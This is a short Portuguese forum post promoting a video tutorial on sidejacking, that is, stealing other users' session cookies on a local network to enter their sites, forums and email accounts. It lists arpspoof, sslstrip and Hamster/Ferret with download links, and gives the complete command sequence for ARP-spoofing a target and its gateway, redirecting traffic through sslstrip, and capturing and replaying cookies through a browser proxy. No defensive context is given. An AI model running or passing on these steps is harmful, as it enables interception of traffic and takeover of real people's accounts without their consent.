Nessa vídeo aula mostro como usar alguns programas para fazer um clonagem de cookies (
Seção Sidejacking ) em uma rede local, Ex: entra em um determinado domínio(sites, forums, caixa e-mail e etc), com os cookies alheios. rsrs...
Foram usando na vídeo:arpspoof
sslstrip
Hamster (e Ferret)
Programas:arpspoof (http://"http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz")(DSniff) Versão: 2.3
sslstrip (http://"http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz") Versão: 0.6
Hamster Sidejacking Tool (http://"http://hamster.erratasec.com/downloads/hamster-2.0.0.tar.z") Versão: 2.0
Comandos: Quoteecho 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.100 10.1.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
/pentest/sniffers/hamster/ferret -i eth0
/pentest/sniffers/hamster/hamster
Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster (http://hamster)
Previas:Quotehttp://img685.imageshack.us/img685/9859/sidejaking.png (http://img685.imageshack.us/img685/9859/sidejaking.png)
http://img88.imageshack.us/img88/4425/sidejaking1.png (http://img88.imageshack.us/img88/4425/sidejaking1.png)
Download:Quotehttp://www.4shared.com/file/fVOJq_zW/Sidejacking.html (http://www.4shared.com/file/fVOJq_zW/Sidejacking.html)
Assista on-line:
Quotehttp://blip.tv/file/3519001 (http://blip.tv/file/3519001)